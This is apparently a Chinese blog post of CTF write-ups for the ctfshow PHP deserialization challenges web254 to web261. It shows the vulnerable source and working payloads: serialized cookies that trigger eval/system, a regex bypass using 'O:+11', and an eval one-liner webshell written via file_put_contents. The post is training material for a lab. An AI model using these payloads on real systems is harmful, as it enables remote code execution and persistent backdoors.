ctfshow web反序列化(254-261)

最新推荐文章于 2024-08-31 21:20:30 发布
最新推荐文章于 2024-08-31 21:20:30 发布
阅读量508 收藏 1
点赞数 2
分类专栏: ctfshow刷题之旅 php web基础漏洞 文章标签: 前端 javascript java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62274649/article/details/128333395
版权

终于又开始做反序列化这一部分的题,希望做完这些题,能对反序列化这一块有更深的理解。

web254

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
  public $username='xxxxxx';
  public $password='xxxxxx';
  public $isVip=false;

  public function checkVip(){
    return $this->isVip;
  }
  public function login($u,$p){
    if($this->username===$u&&$this->password===$p){
      $this->isVip=true;
    }
    return $this->isVip;
  }
  public function vipOneKeyGetFlag(){
    if($this->isVip){
      global $flag;
      echo "your flag is ".$flag;
    }else{
      echo "no vip, no flag";
    }
  }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
  $user = new ctfShowUser();
  if($user->login($username,$password)){
    if($user->checkVip()){
      $user->vipOneKeyGetFlag();
    }
  }else{
    echo "no vip,no flag";
  }
}

刚看到这一块代码,直接懵掉:怎么这么长呀!!!!硬着头皮看。其实前面这一长串对变量和函数的定义可以先不看,先看后面的代码。
在这里插入图片描述

其中

if($user->login($username,$password)){

如果user里login( u s e r n a m e , username, usernamepassword)成立,就执行下面的语句这个时候我们再去看前面关于login这个函数的定义

public function login($u,$p){
    if($this->username===$u&&$this->password===$p){
      $this->isVip=true;
    }
    return $this->isVip;
  }

就是检验user里的username和password是不是分别等于 u 和 u和 up.一旦这个成立,user的isvip就会由false变成true。接下来返回isvip的属性,即isvip是true还是false再看

 if($user->checkVip()){

再来判断user 是否满足checkvip这个函数再去前面审一下这个函数:
在这里插入图片描述
原来这个就是用来返回isvip的属性的。如果第三句成立,那么经过这一句就会返回true.

$user->vipOneKeyGetFlag();

再去看vipOneKeyGetFlag这个函数的定义
在这里插入图片描述
意思就是如果isvip为true就会返回flag。。。综上,我们只需要满足第三句,就会使isvip返回true然后经过第四句返回true,再经过第五句直接输出flagpayload:

/?username=xxxxxx&password=xxxxxx

flag get!!!

web255

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

乍一看和上一个题长得差不多,仔细一看,下面多了一句:

$user = unserialize($_COOKIE['user']);

就是对user做了一个反序列化的操作于是我试着构造了一个这样的flag:

?user=o:4:'user':2{s:8:'username';s:6:'xxxxxx'';s:8:'password';s:6:'xxxxxx'}

然后我把这一串加到cookie里,结果加都加不上去,开始怀疑。看了群主的视频,顿时感觉错得太离谱了。正确思路:cookie传的值肯定是要对类进行序列化后的字符串,这个是没问题的。但是应该新建一个本地php文件测试一下,把上面的类的代码粘贴上去。需要注意的是1.new的是类:ctfShowUser而不是user。2.这里是需要进行url编码的,只有这样cookie那一栏才能识别!3.上面的login函数发生了改变,即使username和password是和我们定义的public变量相匹配,也不会返回isvip为真。所以我们要给它手动改为true。
在这里插入图片描述

在这里插入图片描述
剩下的代码是和上一个题是一样的,payload还是

?username=xxxxxx&password=xxxxxx

cookie的设置。
在这里插入图片描述
flag get!!!

web256

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

if($this->username!==$this->password)

这个相比上一个只是多了一个要求,username不能和password一样,但是还是要满足username和声明的public变量一样。所以我们把public变量的内容改一下就行了。其他的步骤和上一个题一样。没做出来的原因就在于,我以为public变量的内容是固定的,不能改。

web257

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

老样子,先审源码。相比上一个题。ctfShowUser这个类多了一个$class变量并且它的初始值是‘info’可以看到,;info;是下面定义的一个类,但是这个对得到flag没有任何帮助。然后注意到下面还有一个backdoor类。调用这个类的时候会有一个code变量,并且我们可以控制这个变量。后面也有一个eval执行code这个变量的内容。这个应该就是突破点。本地执行下面

<?php
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
private $username='xxxxxx';
private $password='xxxxxx';
private $isVip=true;
private $class = 'backDoor';

public function __construct(){
$this->class=new backDoor();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}

}

class info{
private $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}

class backDoor{
    private $code='system("tac flag.php");';
    public function getInfo(){
        eval($this->code);
    }
}

echo urlencode(serialize(new ctfShowUser()));
?>

生成

O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A1%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D

添加到cookie中,get传参:username=xxxxxx.password=xxxxxxflag get!

web258

<?php
  error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

这个跟上一个题也是大同小异,只不过后面多了个pregmatch正则匹配,这里的[oc]就代表是正则表达式。正则匹配:用来描述或者匹配一系列符合某个句法规则的字符串的单个字符串,简单说,就是我们写个模板,然后去匹配字符串。/d 表示:匹配一个数字字符,等价于“[0-9]”+:匹配前面的子表达式一次或者多次,如“xu+”这个表达式就能够匹配“xuu”和“xu”,但不能够匹配“x”/i:不区分大小写。这个就是过滤了o或者c:数字。先本地测试

$a=serialize(new ctfShowUser());
echo $a;

得到:

O:11:"ctfShowUser":4:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";s:5:"isVip";b:1;s:5:"class";O:8:"backDoor":1:{s:4:"code";N;}}

发现第一个o:11和后面的o:8会被过滤。绕过过滤可以在冒号后面加上个+。至于为什么加上+能绕过过滤,听群主说好像跟反序列化的c语言底层逻辑有关。

$a =serialize(new ctfShowUser());
$b=str_replace(':11',':+11',$a);
$c=str_replace(':8',':+8',$b);
echo urlencode($c);

然后,username和password随便传。flag get!

web259

web260

<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    echo $flag;
}

这个比较简单,就是传进去的ctfshow这个参数,如果对他进行反序列化以后,里面如果有ctfshow_i_love_36D,这一段,就输出flag。那么我们直接构造

O:1:"A":1:{s:4:"user";s:18:"ctfshow_i_love_36D"}

直接get flag!

web261

<?php

highlight_file(__FILE__);

class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){
        eval($this->code);
    }

    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}

unserialize($_GET['vip']);

看一下这个题目的源码,涉及到以下几个魔术方法。

__construct(): //构造函数,当对象new的时候会自动调用

__destruct()://析构函数当对象被销毁时会被自动调用

__wakeup(): //unserialize()时会被自动调用

__invoke(): //当尝试以调用函数的方法调用一个对象时,会被自动调用

__sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用

这里我们主要看__destruct方法,,如果code的值等于0x36d,这里没有加单引号,所以表示的是数值,0x则表示是十六进制,就等于877然后这里是弱等于,所以我们再在后面就上.php甚至加上一句话木马也是可以的。然后后面有个file_put_contents。把字符串写入文件中。本地构造

<?php
class ctfshowvip{
    public $username="877.php";
    public $password='<?php @eval($_POST[a]); ?>';
}
$a=new ctfshowvip();
echo urlencode(serialize($a));

在这里插入图片描述
然后蚁剑连接,发现:flag_is_here,打开得到flag。

R3ality
关注
专栏目录
CTFshow 反序列化 web261
Kradress的博客
12-20 2427
目录源码思路题解总结 源码 <?php highlight_file(__FILE__); class ctfshowvip{ public $username; public $password; public $code; public function __construct($u,$p){ //对象创建时会自动调用。 $this->username=$u; $this->password=$p; }
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6364
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
ctfshow web入门 web254——— 反序列化wp
2202_75289892的博客
08-20 1404
代码审计:定义了ctfShoeUser类get传参username和password,isset()是检查变量是否被定义的函数,若变量被定义且值不是null,那么返回值是true,接着实例化对象user.....最终输出flag所以我们传入的参数只要是已经被定义的值就行?
ctfshow web261
qq_45694932的博客
10-06 611
<?php highlight_file(__FILE__); class ctfshowvip{ public $username; public $password; public $code; public function __construct($u,$p){ $this->username=$u; $this->password=$p; } public function __wakeup()
ctfshow-web261(反序列化)
m0_62094846的博客
02-27 613
<?php highlight_file(__FILE__); class ctfshowvip{ public $username; public $password; public $code; public function __construct($u,$p){ $this->username=$u; $this->password=$p; } public function __wakeup(.
CTFshow F5杯,反序列化题解
zac的博客
02-26 431
因为在搜wp时没有发现这个解法,就在这里发一下f1hgb的解法,原题和revenge都能解出 题目源码(就只放第一道了 <?php include "mysqlDb.class.php"; class ctfshow{ public $method; public $args; public $cursor; function __construct($method, $args) { $this->method = $method;
ctfshow 反序列化Web254-255
m0_62584974的博客
04-21 2302
2022/4/17 反序列化漏洞的产生主要有以下两个原因: 1. unserialize 函数的参数可控。 2.存在魔法函数。 魔法函数 __construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1879
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
ctfshow web入门文件包含82-86
xiaolong22333的博客
12-14 2459
知识点: 利用session.upload_progress进行文件包含 条件竞争 思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透 其中主要的几点 首先上传PHP_SESSION_UPLOAD_PROGRESS,代码如下 <!DOCTYPE html> <html> <body> <f
ctfshow python反序列化 刷题记录
2301_82243979的博客
04-28 426
是一个字典,包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数,以便服务器可以根据这些参数来处理请求。先看给的提示:传入的 data 先进行 base64 解码后在进行反序列化,所以我们序列化完成之后还要额外进行 base64 编码。,也可以在 http://ceye.io/payloads 中找相对应的 payload。的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。
ctfshow web 反序列化(web254-278)
qq_50589021的博客
09-04 7500
知识储备 随笔分类 - PHP常识 PHP中的魔术变量: __sleep() //执行serialize()时,先会调用这个函数 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过) __construct() //当对象被创建时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中
CTFshow 反序列化 web262
Kradress的博客
12-20 2697
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
CTFshow反序列化-web254-270
最新发布
qq_52579508的博客
08-31 1796
看着代码挺多 一步步看首先定位怎么拿flag主要是是这段如果username和u相等,password和p 相等执行下一句 赋值 ,然后 返回 isvip等于true我们直接让isvip 等于true ,然后输入username的时候等于 源代码里面的值其实就是个判断都还没开始上序列化。
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1599
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTFShow-Web入门
weixin_58546222的博客
12-15 897
CTFShow爆破解题思路
日志2(web260、web261
weixin_53955759的博客
03-31 652
web260 源码: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){ echo $flag; } 这题刚开始想复杂了,仔细看了以后发现只用?ctfshow=ctfshow_i_love_36D就可以得到flag web261 源码: <?php hi
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 3047
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门 反序列化 前篇 254-266
m0_64815693的博客
04-08 1864
ctfshow web入门 反序列化 254-278
CTFshow 反序列化 web254
Kradress的博客
12-19 300
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow-web入门-php_unserialize-web254-278
m0_72655585的博客
07-17 1699
PHP 序列化及反序列化基础反序列化学习笔记[CTF]PHP反序列化总结。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

R3ality

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值